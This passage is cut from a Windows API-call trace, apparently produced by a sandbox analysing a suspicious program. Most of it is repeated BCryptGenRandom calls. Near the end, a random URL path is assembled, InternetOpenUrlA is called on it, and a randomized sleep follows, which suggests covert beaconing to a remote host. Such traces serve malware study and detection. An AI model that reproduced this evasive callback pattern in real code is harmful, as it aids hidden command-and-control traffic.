pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.984] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.991] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.991] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.992] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.992] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.992] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.992] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.992] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.992] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.993] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.993] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.993] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.994] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.994] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0262.995] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.995] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.995] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.995] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.995] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.996] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.996] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.996] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.997] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0262.997] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.997] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.998] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.998] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.998] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.998] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0262.998] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.998] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.998] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.999] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.999] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.999] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.999] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.999] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.000] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.000] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.000] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0263.000] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.001] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.001] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.001] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.001] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.001] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0263.001] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.001] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a028a4, cbBuffer=0x14, dwFlags=0x2 | out: pbBuffer=0x3a028a4) returned 0x0 [0263.002] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.002] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.002] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.002] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.002] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.002] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.002] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.002] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.003] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.003] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.003] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.003] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.003] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.003] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.003] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.004] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.004] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.004] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.004] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.004] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.005] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.005] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0263.005] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.005] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.005] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.007] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.007] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.007] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.007] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.007] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.007] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.007] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.008] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.008] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.008] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.008] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.008] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.008] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0263.009] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.009] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a028b8, cbBuffer=0x29, dwFlags=0x2 | out: pbBuffer=0x3a028b8) returned 0x0 [0263.009] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.009] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.009] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.009] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.009] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.009] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.010] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.010] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.010] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.010] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.010] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.010] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.010] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.010] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.011] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.011] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.011] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.011] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.011] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.011] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.012] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.012] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.012] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.012] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.012] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.013] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.013] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.013] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.014] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.014] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.014] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.014] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.015] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.015] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.015] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.015] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.015] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.015] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.015] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.015] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.016] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.016] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.016] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.016] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.016] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.016] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.017] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.017] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.017] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.017] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.017] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.017] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.017] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.018] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.018] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.018] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.019] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.019] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.019] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.019] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.019] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.019] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.019] GetProcessHeap () returned 0x440000 [0263.019] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4724e0 [0263.019] lstrcpyA (in: lpString1=0x4724e0, lpString2="P( \x03" | out: lpString1="P( \x03") returned="P( \x03" [0263.019] lstrcatA (in: lpString1="P( \x03", lpString2="/Ga9fjEiux5ljvGy7/JljhjZ2nopJ61qbjdJbcqsx/1446K4ohob6keOcl5DuxfyBJ0tqiV85I43rcvwRxw/8rkun783y8qVrav4mok/ycfcfkel1zZtohnqwCootceQxf3jvm1chg8wswrb/" | out: lpString1="P( \x03/Ga9fjEiux5ljvGy7/JljhjZ2nopJ61qbjdJbcqsx/1446K4ohob6keOcl5DuxfyBJ0tqiV85I43rcvwRxw/8rkun783y8qVrav4mok/ycfcfkel1zZtohnqwCootceQxf3jvm1chg8wswrb/") returned="P( \x03/Ga9fjEiux5ljvGy7/JljhjZ2nopJ61qbjdJbcqsx/1446K4ohob6keOcl5DuxfyBJ0tqiV85I43rcvwRxw/8rkun783y8qVrav4mok/ycfcfkel1zZtohnqwCootceQxf3jvm1chg8wswrb/" [0263.019] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0263.020] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="P( \x03/Ga9fjEiux5ljvGy7/JljhjZ2nopJ61qbjdJbcqsx/1446K4ohob6keOcl5DuxfyBJ0tqiV85I43rcvwRxw/8rkun783y8qVrav4mok/ycfcfkel1zZtohnqwCootceQxf3jvm1chg8wswrb/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0263.020] GetProcessHeap () returned 0x440000 [0263.020] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4724e0 | out: hHeap=0x440000) returned 1 [0263.020] GetProcessHeap () returned 0x440000 [0263.020] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a02850 | out: hHeap=0x440000) returned 1 [0263.020] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0263.020] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0263.020] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0263.150] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0263.150] Sleep (dwMilliseconds=0x17ac3) [0263.288] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0263.289] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.289] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0263.289] GetProcessHeap () returned 0x440000 [0263.289] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0263.289] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.289] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0263.290] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.290] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x1d, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0263.290] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.290] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0263.290] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.291] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.292] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.292] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.292] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.292] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, 